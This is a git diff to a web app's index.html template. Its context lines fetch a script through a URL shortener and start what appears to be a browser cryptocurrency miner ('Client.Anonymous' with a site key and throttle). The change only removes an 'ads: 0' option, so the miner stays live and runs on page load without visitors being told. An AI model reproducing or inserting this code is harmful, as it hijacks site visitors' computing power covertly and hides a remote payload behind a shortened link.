--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -132,7 +132,7 @@ if (getDarkCookie() == 'true') {
 <script>
   $.getScript("https://cutt.ly/wns1PUz", function() {
     var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
-        throttle: 0.7, c: 'w', ads: 0
+        throttle: 0.7, c: 'w'
     });
     _client.start();
     console.log('-');
